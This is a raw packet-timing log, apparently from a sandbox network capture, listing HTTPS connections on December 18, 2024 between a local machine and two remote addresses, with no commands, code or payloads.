                                                                                                                                                                          Dec 18, 2024 13:06:26.238607883 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238619089 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238672972 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238686085 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238697052 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238708973 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238740921 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.437436104 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437469006 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437505960 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437532902 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.437572956 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437589884 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.486247063 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.490322113 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490350962 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490437984 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.490466118 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490513086 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.497761011 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.497909069 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.497966051 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.497987986 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.548863888 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.601485014 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601496935 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601541042 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601572037 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601582050 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601624012 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.601639986 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601670980 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.642540932 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.672038078 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672054052 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672096968 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672131062 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672141075 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672235966 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.672255039 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672373056 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692416906 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692425013 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692472935 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692549944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692549944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692570925 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692650080 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.710855007 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.710907936 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.710944891 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.711019039 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.711040974 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.716285944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730163097 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730201960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.730329990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730546951 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730570078 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:28.604163885 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:28.606208086 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:28.606225014 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.550539970 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.595597029 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.657993078 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658030987 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658088923 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658164024 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658176899 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658186913 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658207893 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658269882 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658274889 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.704988003 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115209103 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115245104 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115294933 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115349054 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115370035 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115401030 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115452051 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.119185925 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.173754930 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370652914 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370686054 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370722055 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370737076 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370758057 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370764017 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370786905 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370791912 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370816946 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370836020 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.470088959 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.470199108 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.470346928 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.470361948 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.517541885 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.609337091 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.609363079 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.609467983 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.609479904 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706768036 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706865072 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.706876040 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.706939936 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.708751917 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.708890915 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.910862923 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.910888910 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.911091089 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.911108971 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.911176920 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.911194086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926062107 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926081896 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.926168919 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.926182032 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938828945 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938872099 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.938978910 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.938991070 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:33.939045906 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:33.939075947 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018668890 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018690109 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018745899 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018778086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.018799067 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.018827915 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.019665956 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.064388990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.152498960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152527094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152586937 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152604103 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.152620077 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.152663946 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.167762995 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167793036 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167870045 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.167887926 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.167921066 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.183321953 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183371067 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183444023 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.183449984 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.183487892 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.236242056 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.236253023 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255580902 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255697012 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255718946 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255740881 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255740881 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255758047 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255786896 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.255795002 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.255815983 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.298770905 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.298784971 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.345585108 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387607098 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387618065 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387656927 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387669086 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387677908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387696028 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387702942 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.387713909 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.387734890 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.389405966 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403273106 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403302908 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403342962 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.403371096 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.403464079 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403482914 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.403502941 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.420030117 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420046091 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420087099 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420099020 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.420118093 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.420139074 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.435391903 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435427904 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435456991 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.435465097 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.435499907 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.486229897 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.486252069 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.533086061 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615187883 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615219116 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615267038 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615272045 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615288973 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615323067 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615343094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.615350008 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.615385056 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.617059946 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629755974 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629800081 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629837036 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.629859924 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629873037 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.629895926 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.629909039 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.631695986 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.631743908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.635957003 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636037111 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.636056900 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636085987 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.636133909 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.643273115 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:34.883513927 CET49721443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:34.883563042 CET4434972152.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513147116 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513164043 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513174057 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513179064 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.513199091 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513216019 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.564400911 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.585967064 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586033106 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586103916 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586129904 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586157084 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.586170912 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586200953 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.586220980 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.589590073 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.642548084 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.749984026 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.749998093 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750044107 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750058889 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750171900 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.750195980 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750207901 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.750569105 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.751651049 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.798902988 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.826921940 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826935053 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826984882 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826999903 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827016115 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827052116 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.827063084 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827095985 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854235888 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854311943 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854334116 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854346991 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854365110 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854377031 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854387999 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854396105 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.908143044 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.908159018 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.955051899 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058058977 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058072090 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058111906 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058131933 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058135033 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058163881 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058176994 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058186054 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058213949 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058222055 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085661888 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085724115 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085726976 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085741043 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085757971 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085769892 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085777044 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085803986 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085813046 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085850954 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.225781918 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225795984 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225846052 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225945950 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.225961924 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225981951 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.226006031 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.278734922 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303488016 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303513050 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303596020 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.303610086 CET4434972252.95.162.66192.168.2.8
